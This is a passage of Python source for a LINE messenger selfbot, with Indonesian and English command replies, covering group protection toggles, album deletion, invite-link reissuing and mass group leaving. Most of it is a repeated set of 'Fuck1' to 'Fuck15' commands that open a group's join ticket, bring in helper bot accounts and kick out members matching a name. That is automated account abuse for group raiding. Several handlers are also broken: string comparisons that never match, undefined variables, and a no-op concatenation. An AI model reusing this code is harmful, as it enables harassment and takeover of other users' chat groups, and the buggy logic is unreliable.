wait["linkprotect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Link Protect Enable")
else:
cl.sendText(msg.to,"It is already On ô€¨")
elif msg.text in ['Proinvite:on']:
if wait["inviteprotect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Invite Protect Enable ✔")
else:
cl.sendText(msg.to,"Hal ini sudah terbuka ✔")
else:
wait["inviteprotect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Invite Protect Enable")
else:
cl.sendText(msg.to,"It is already On ¨")
elif msg.text in ['Procancel:on']:
if wait["cancelprotect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Protection Enable ✔")
else:
cl.sendText(msg.to,"Hal ini sudah terbuka ✔")
else:
wait["cancelprotect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already ON✔")
else:
cl.sendText(msg.to,"It is already On ✔")
elif msg.text.lower() == 'join:on':
if wait["autoJoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Ini sudah on✔")
else:
cl.sendText(msg.to,"Hal ini sudah terbuka ✔")
else:
wait["autoJoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already ON✔")
else:
cl.sendText(msg.to,"It is already On ✔")
elif msg.text.lower() == 'blocklist':
blockedlist = cl.getBlockedContactIds()
cl.sendText(msg.to, "Please wait...")
kontak = cl.getContacts(blockedlist)
num=1
msgs="✖User Blocked List✖\n"
for ids in kontak:
msgs+="\n%i. %s" % (num, ids.displayName)
num=(num+1)
msgs+="\n\nTotal %i blocked user(s)" % len(kontak)
cl.sendText(msg.to, msgs)
elif msg.text.lower() == 'join:off':
if wait["autoJoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Auto Join Already Off✔")
else:
cl.sendText(msg.to,"Auto Join set off✔")
else:
wait["autoJoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already close✔")
else:
cl.sendText(msg.to,"It is already open ✔")
elif msg.text in ["Pro:off"]:
if wait["protect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection Disable ✔")
else:
cl.sendText(msg.to,"sudah dimatikan ✔")
else:
wait["protect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already close")
else:
cl.sendText(msg.to,"It is already open ✔")
elif msg.text in ["Prolink:off"]:
if wait["linkprotect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Link Protection Disable ✖")
else:
cl.sendText(msg.to,"sudah dimatikan ✖")
else:
wait["linkprotect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already close✖")
else:
cl.sendText(msg.to,"It is already open ✔")
elif msg.text in ["Proinvite:off"]:
if wait["inviteprotect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Invite Protection Disable ✖")
else:
cl.sendText(msg.to,"sudah dimatikan ✖")
else:
wait["inviteprotect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already close✖")
else:
cl.sendText(msg.to,"It is already open ✔")
elif msg.text in ["Procancel:off"]:
if wait["cancelprotect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Protection Disable ✖")
else:
cl.sendText(msg.to,"sudah dimatikan ✖")
else:
wait["cancelprotect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already close✖")
else:
cl.sendText(msg.to,"It is already open ✔")
elif "Gcancel:" in msg.text:
try:
strnum = msg.text.replace("Group cancel:","")
if strnum == "off":
wait["autoCancel"]["on"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Itu off undangan ditolak✖\nSilakan kirim dengan menentukan jumlah orang ketika Anda menghidupkan✖")
else:
cl.sendText(msg.to,"Off undangan ditolak✖Sebutkan jumlah terbuka ketika Anda ingin mengirim")
else:
num = int(strnum)
wait["autoCancel"]["on"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,strnum + "Kelompok berikut yang diundang akan ditolak secara otomatis✔")
else:
cl.sendText(msg.to,strnum + "The team declined to create the following automatic invitation")
except:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Nilai tidak benar✖")
else:
cl.sendText(msg.to,"Weird value✖")
elif msg.text in ["Leave:on"]:
if wait["leaveRoom"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"on✔")
else:
cl.sendText(msg.to,"Sudah terbuka ✔")
else:
wait["leaveRoom"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done✔")
else:
cl.sendText(msg.to,"Is already open✔")
elif msg.text in ["Leave:off"]:
if wait["leaveRoom"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"off✖")
else:
cl.sendText(msg.to,"Sudah off✖")
else:
wait["leaveRoom"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done✔")
else:
cl.sendText(msg.to,"Is already close✔")
elif msg.text in ["Share:on"]:
if wait["timeline"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done ✔")
else:
cl.sendText(msg.to,"Hal ini sudah terbuka ✖")
else:
wait["timeline"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"on ✔")
else:
cl.sendText(msg.to,"on ✔")
elif msg.text in ["Share:off"]:
if wait["timeline"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done✔")
else:
cl.sendText(msg.to,"It is already turned off ✔")
else:
wait["timeline"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Off ✖")
else:
cl.sendText(msg.to,"Off ✖")
elif msg.text.lower() == 'set':
md = "{==℘ґ∂ηк в❍тѕ==}\n||=S E T T I N G=||\n\n"
if wait["contact"] == True: md+="✬ Contact:on ✔\n"
else: md+="✬ Contact:off ✖\n"
if wait["autoJoin"] == True: md+="✬ Join:on ✔\n"
else: md +="✬ Join:off ✖\n"
if wait["autoCancel"]["on"] == True:md+="✬ Gcancel:" + str(wait["autoCancel"]["members"]) + " ✔\n"
else: md+= "✬Gcancel:off ✖\n"
if wait["leaveRoom"] == True: md+="✬ Leave:on ✔\n"
else: md+="✬ Leave:off ✖\n"
if wait["timeline"] == True: md+="✬ Share:on ✔\n"
else:md+="✬ Share:off ✖\n"
if wait["autoAdd"] == True: md+="✬ Add:on ✔\n"
else:md+="✬ Add:off ✖\n"
if wait["commentOn"] == True: md+="✬ Com:on ✔\n"
else:md+="✬ Com:off ✖\n\n❴•PROTECTION GROUPS•❵\n"
if wait["protect"] == True: md+="✫ Protect:on ✔\n"
else:md+="✫ Protect:off ✖\n"
if wait["linkprotect"] == True: md+="✫ Prolink:on ✔\n"
else:md+="✫ Prolink:off ✖\n"
if wait["inviteprotect"] == True: md+="✫ Proinvite:on ✔\n"
else:md+="✫ Proinvite:off ✖\n"
if wait["cancelprotect"] == True: md+"✫ Procancel:on ✔\n"
else:md+="✫ Procancel:off ✖\n"
cl.sendText(msg.to,md + "\n\n{==℘ґ∂ηк в❍тѕ==}")
# msg.contentType = 13
# msg.contentMetadata = {'mid': admsa}
# cl.sendMessage(msg)
elif "Gowner" == msg.text:
try:
group = cl.getGroup(msg.to)
GS = group.creator.mid
M = Message()
M.to = msg.to
M.contentType = 13
M.contentMetadata = {'mid': GS}
cl.sendMessage(M)
except:
W = group.members[0].mid
M = Message()
M.to = msg.to
M.contentType = 13
M.contentMetadata = {'mid': W}
cl.sendMessage(M)
cl.sendText(msg.to,"old user")
elif cms(msg.text,["Add"]):
msg.contentType = 13
msg.contentMetadata = {'mid': 'u5818cb4404411c2e2e6e6937d172cca8'}
cl.sendText(msg.to,"❂•••••••••✧••••••••••❂")
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': 'udfaf52176415b46cb445ae2757ec85f3'}
cl.sendMessage(msg)
cl.sendText(msg.to,"❂••••••••✰•✰••••••••❂")
elif "Set album:" in msg.text:
gid = msg.text.replace("Set album:","")
album = cl.getAlbum(gid)
if album["result"]["items"] == []:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Tidak ada album👈")
else:
cl.sendText(msg.to,"Dalam album tidak👈")
else:
if wait["lang"] == "JP":
mg = "Berikut ini adalah album dari target"
else:
mg = "Berikut ini adalah subjek dari album"
for y in album["result"]["items"]:
if "photoCount" in y:
mg += str(y["title"]) + ":" + str(y["photoCount"]) + "æžš\n"
else:
mg += str(y["title"]) + ":0 Pieces\n"
cl.sendText(msg.to,mg)
elif "Album" in msg.text:
gid = msg.text.replace("Album","")
album = cl.getAlbum(gid)
if album["result"]["items"] == []:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Tidak ada album")
else:
cl.sendText(msg.to,"Dalam album tidak")
else:
if wait["lang"] == "JP":
mg = "Berikut ini adalah album dari target"
else:
mg = "Berikut ini adalah subjek dari album"
for y in album["result"]["items"]:
if "photoCount" in y:
mg += str(y["title"]) + ":" + str(y["photoCount"]) + "\n"
else:
mg += str(y["title"]) + ":0 pieces\n"
elif "Hapus album " in msg.text:
gid = msg.text.replace("Hapus album ","")
albums = cl.getAlbum(gid)["result"]["items"]
i = 0
if albums != []:
for album in albums:
cl.deleteAlbum(gid,album["gid"])
i += 1
if wait["lang"] == "JP":
cl.sendText(msg.to,str(i) + "Soal album telah dihapus")
else:
cl.sendText(msg.to,str(i) + "Hapus kesulitan album🛡")
elif msg.text.lower() == 'group id':
gid = cl.getGroupIdsJoined()
h = "❂•••••••L I S T I D G R O U P•••••••❂\n "
for i in gid:
h += "[%s]:%s\n" % (cl.getGroup(i).name,i)
cl.sendText(msg.to,h)
elif msg.text.lower() == 'all:out':
gid = cl.getGroupIdsJoined()
gid = ki.getGroupIdsJoined()
gid = ki2.getGroupIdsJoined()
# gid = ki3.getGroupIdsJoined()
# gid = ki4.getGroupIdsJoined()
# gid = ki5.getGroupIdsJoined()
# gid = ki6.getGroupIdsJoined()
for i in gid:
ki.leaveGroup(i)
ki2.leaveGroup(i)
# ki3.leaveGroup(i)
# ki4.leaveGroup(i)
# ki5.leaveGroup(i)
# ki6.leaveGroup(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"Kitsune Bot Sudah Keluar Di semua grup")
else:
cl.sendText(msg.to,"He declined all invitations")
elif msg.text in ["Gcancelall"]:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"Aku menolak semua undangan")
else:
cl.sendText(msg.to,"He declined all invitations")
elif "Album deleted:" in msg.text:
gid = msg.text.replace("Album deleted:","")
albums = cl.getAlbum(gid)["result"]["items"]
i = 0
if albums != []:
for album in albums:
cl.deleteAlbum(gid,album["id"])
i += 1
if wait["lang"] == "JP":
cl.sendText(msg.to,str(i) + "Soal album telah dihapus👈")
else:
cl.sendText(msg.to,str(i) + "Hapus kesulitan album👈")
elif msg.text in ["Add:on","Add auto on"]:
if wait["autoAdd"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already On✔")
else:
cl.sendText(msg.to,"Already On✔")
else:
wait["autoAdd"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already On✔")
else:
cl.sendText(msg.to,"Already On✔")
elif msg.text in ["Add:off","Add auto off"]:
if wait["autoAdd"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Hal ini sudah off✖")
else:
cl.sendText(msg.to,"Hal ini sudah dimatikan✖")
else:
wait["autoAdd"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already Off✖")
else:
cl.sendText(msg.to,"Untuk mengaktifkan-off✖")
elif "Message set:" in msg.text:
wait["message"] = msg.text.replace("Message set:","")
cl.sendText(msg.to,"✨We changed the message✨")
elif "Help set:" in msg.text:
wait["help"] = msg.text.replace("Help set:","")
cl.sendText(msg.to,"✨We changed the Help✨")
elif "Msg add-" in msg.text:
wait["message"] = msg.text.replace("Pesan add-","")
if wait["lang"] == "JP":
cl.sendText(msg.to,"✨Kami mengubah pesan✨")
else:
cl.sendText(msg.to,"Change information")
elif msg.text in ["Pesan add cek","Message confirm"]:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Additional information is automatically set to the following \n\n" + wait["message"])
else:
cl.sendText(msg.to,"Pesan tambahan otomatis telah ditetapkan sebagai berikut \n\n" + wait["message"])
elif msg.text in ["Change","change"]:
if wait["lang"] =="JP":
wait["lang"] = "TW"
cl.sendText(msg.to,"I changed the language to engglis✔")
else:
wait["lang"] = "JP"
cl.sendText(msg.to,"I changed the language to indonesia✔")
elif "Message set" in msg.text:
c = msg.text.replace("Message set","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"Is a string that can not be changed✔")
else:
wait["comment"] = c
cl.sendText(msg.to,"✨This has been changed✨\n\n" + c)
elif "Com set:" in msg.text:
c = msg.text.replace("Come Set:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"Merupakan string yang tidak bisa diubah✔")
else:
wait["comment"] = c
cl.sendText(msg.to,"Ini telah diubah✔\n\n" + c)
elif msg.text in ["Comment:on","Com:on","Comment on"]:
if wait["commentOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Aku berada di✔")
else:
cl.sendText(msg.to,"To open✔")
else:
wait["commentOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"✔")
else:
cl.sendText(msg.to,"✔")
elif msg.text in ["Com:off"]:
if wait["commentOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Hal ini sudah off ✖")
else:
cl.sendText(msg.to,"It is already turned off ✖")
else:
wait["commentOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Off✖")
else:
cl.sendText(msg.to,"To turn off✖")
elif msg.text in ["Com","Comment"]:
cl.sendText(msg.to,"✨Auto komentar saat ini telah ditetapkan sebagai berikut✨\n\n" + str(wait["comment"]))
elif msg.text in ["Glink","Url"]:
if msg.toType == 2:
g = cl.getGroup(msg.to)
if g.preventJoinByTicket == True:
g.preventJoinByTicket = False
cl.updateGroup(g)
gurl = cl.reissueGroupTicket(msg.to)
cl.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Hal ini tidak dapat digunakan di luar kelompok")
else:
cl.sendText(msg.to,"Tidak dapat digunakan untuk kelompok selain")
elif "gurl+" in msg.text:
if msg.toType == 2:
gid = msg.text.replace("gurl+","")
gurl = cl.reissueGroupTicket(gid)
cl.sendText(msg.to,"line://ti/g/" + gurl)
else:
cl.sendText(msg.to,"グループ以外ã§ã¯ä½¿ç”¨ã§ãã¾ã›ã‚“👈")
elif "gurl" in msg.text:
if msg.toType == 1:
tid = msg.text.replace("gurl","")
turl = ki.getUserTicket(tid)
ki.sendText(msg.to,"line://ti/p" + turl)
else:
ki.sendText(msg.to,"error")
elif msg.text in ["Gurl"]:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
cl.updateGroup(x)
gurl = cl.reissueGroupTicket(msg.to)
cl.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
# else:
# cl.sendText(msg.to,"Tidak dapat digunakan untuk kelompok selain")
elif msg.text in ["Comban"]:
wait["wblack"] = True
cl.sendText(msg.to,"Please send contacts from the person you want to add to the blacklist…”✚")
elif msg.text in ["Comban del"]:
wait["dblack"] = True
cl.sendText(msg.to,"Please send contacts from the person you want to add from the blacklist…”✚")
elif msg.text in ["Comban cek"]:
if wait["commentBlack"] == {}:
cl.sendText(msg.to,"Nothing in the blacklist✖")
else:
cl.sendText(msg.to,"The following is a blacklist✔")
mc = ""
for mi_d in wait["commentBlack"]:
mc += "・" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif msg.text.lower() == 'Clock:on':
if wait["clock"] == True:
cl.sendText(msg.to,"Sudah On")
else:
wait["clock"] = True
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
cl.sendText(msg.to,"Jam on✔")
elif msg.text.lower() == 'Clock:off':
if wait["clock"] == False:
cl.sendText(msg.to,"Hal ini sudah off✖")
else:
wait["clock"] = False
cl.sendText(msg.to," Dimatikan ✔")
elif "Clockname " in msg.text:
n = msg.text.replace("Jam say ","")
if len(n.decode("utf-8")) > 30:
cl.sendText(msg.to,"terlalu lama")
else:
wait["cName"] = n
cl.sendText(msg.to,"Ini telah diubah✔\n\n" + n)
elif msg.text.lower() == 'update':
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
cl.sendText(msg.to,"Diperbarui✔")
else:
cl.sendText(msg.to,"✨Silahkan Aktifkan Nama✨")
elif "Fuck1 " in msg.text:
nk0 = msg.text.replace("Fuck1 ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
gs.preventJoinByTicket = False
cl.updateGroup(gs)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
ki.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki.leaveGroup(msg.to)
gs = cl.getGroup(msg.to)
gs.preventJoinByTicket = True
cl.updateGroup(gs)
gs.preventJoinByTicket(gs)
cl.updateGroup(gs)
#-----------------------------------------------------------
elif "Fuck2 " in msg.text:
nk0 = msg.text.replace("Fuck2 ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
gs.preventJoinByTicket = False
cl.updateGroup(gs)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
ki2.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki2.leaveGroup(msg.to)
gs = cl.getGroup(msg.to)
gs.preventJoinByTicket = True
cl.updateGroup(gs)
gs.preventJoinByTicket(gs)
cl.updateGroup(gs)
#-----------------------------------------------------------
elif "Fuck3 " in msg.text:
nk0 = msg.text.replace("Fuck3 ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
gs.preventJoinByTicket = False
cl.updateGroup(gs)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
ki3.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki3.leaveGroup(msg.to)
gs = cl.getGroup(msg.to)
gs.preventJoinByTicket = True
cl.updateGroup(gs)
gs.preventJoinByTicket(gs)
cl.updateGroup(gs)
#-----------------------------------------------------------
elif "Fuck4 " in msg.text:
nk0 = msg.text.replace("Fuck4 ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
gs.preventJoinByTicket = False
cl.updateGroup(gs)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
ki4.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki4.leaveGroup(msg.to)
gs = cl.getGroup(msg.to)
gs.preventJoinByTicket = True
cl.updateGroup(gs)
gs.preventJoinByTicket(gs)
cl.updateGroup(gs)
#-----------------------------------------------------------
elif "Fuck5 " in msg.text:
nk0 = msg.text.replace("Fuck5 ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
gs.preventJoinByTicket = False
cl.updateGroup(gs)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
ki5.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki5.leaveGroup(msg.to)
gs = cl.getGroup(msg.to)
gs.preventJoinByTicket = True
cl.updateGroup(gs)
gs.preventJoinByTicket(gs)
cl.updateGroup(gs)
#-----------------------------------------------------------
elif "Fuck6 " in msg.text:
nk0 = msg.text.replace("Fuck6 ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
gs.preventJoinByTicket = False
cl.updateGroup(gs)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki6.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
ki6.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki6.leaveGroup(msg.to)
gs = cl.getGroup(msg.to)
gs.preventJoinByTicket = True
cl.updateGroup(gs)
gs.preventJoinByTicket(gs)
cl.updateGroup(gs)
#-----------------------------------------------------------
elif "Fuck7 " in msg.text:
nk0 = msg.text.replace("Fuck7 ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
gs.preventJoinByTicket = False
cl.updateGroup(gs)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki7.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
ki7.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki7.leaveGroup(msg.to)
gs = cl.getGroup(msg.to)
gs.preventJoinByTicket = True
cl.updateGroup(gs)
gs.preventJoinByTicket(gs)
cl.updateGroup(gs)
#-----------------------------------------------------------
elif "Fuck8 " in msg.text:
nk0 = msg.text.replace("Fuck8 ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
gs.preventJoinByTicket = False
cl.updateGroup(gs)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki8.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
ki8.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki8.leaveGroup(msg.to)
gs = cl.getGroup(msg.to)
gs.preventJoinByTicket = True
cl.updateGroup(gs)
gs.preventJoinByTicket(gs)
cl.updateGroup(gs)
#-----------------------------------------------------------
elif "Fuck9 " in msg.text:
nk0 = msg.text.replace("Fuck9 ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
gs.preventJoinByTicket = False
cl.updateGroup(gs)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki9.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
ki9.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki9.leaveGroup(msg.to)
gs = cl.getGroup(msg.to)
gs.preventJoinByTicket = True
cl.updateGroup(gs)
gs.preventJoinByTicket(gs)
cl.updateGroup(gs)
#-----------------------------------------------------------
elif "Fuck10 " in msg.text:
nk0 = msg.text.replace("Fuck10 ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
gs.preventJoinByTicket = False
cl.updateGroup(gs)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki10.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
ki10.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki10.leaveGroup(msg.to)
gs = cl.getGroup(msg.to)
gs.preventJoinByTicket = True
cl.updateGroup(gs)
gs.preventJoinByTicket(gs)
cl.updateGroup(gs)
#-----------------------------------------------------------
elif "Fuck11 " in msg.text:
nk0 = msg.text.replace("Fuck11 ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
gs.preventJoinByTicket = False
cl.updateGroup(gs)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki11.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
ki11.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki11.leaveGroup(msg.to)
gs = cl.getGroup(msg.to)
gs.preventJoinByTicket = True
cl.updateGroup(gs)
gs.preventJoinByTicket(gs)
cl.updateGroup(gs)
#-----------------------------------------------------------
elif "Fuck12 " in msg.text:
nk0 = msg.text.replace("Fuck12 ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
gs.preventJoinByTicket = False
cl.updateGroup(gs)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki12.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
ki12.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki12.leaveGroup(msg.to)
gs = cl.getGroup(msg.to)
gs.preventJoinByTicket = True
cl.updateGroup(gs)
gs.preventJoinByTicket(gs)
cl.updateGroup(gs)
#-----------------------------------------------------------
elif "Fuck13 " in msg.text:
nk0 = msg.text.replace("Fuck13 ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
gs.preventJoinByTicket = False
cl.updateGroup(gs)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki13.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
ki13.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki13.leaveGroup(msg.to)
gs = cl.getGroup(msg.to)
gs.preventJoinByTicket = True
cl.updateGroup(gs)
gs.preventJoinByTicket(gs)
cl.updateGroup(gs)
#-----------------------------------------------------------
elif "Fuck14 " in msg.text:
nk0 = msg.text.replace("Fuck14 ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
gs.preventJoinByTicket = False
cl.updateGroup(gs)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki14.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
ki14.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki14.leaveGroup(msg.to)
gs = cl.getGroup(msg.to)
gs.preventJoinByTicket = True
cl.updateGroup(gs)
gs.preventJoinByTicket(gs)
cl.updateGroup(gs)
#-----------------------------------------------------------
elif "Fuck15 " in msg.text:
nk0 = msg.text.replace("Fuck15 ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
gs.preventJoinByTicket = False
cl.updateGroup(gs)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki15.acceptGroupInvitationByTicket(msg.to,Ticket)
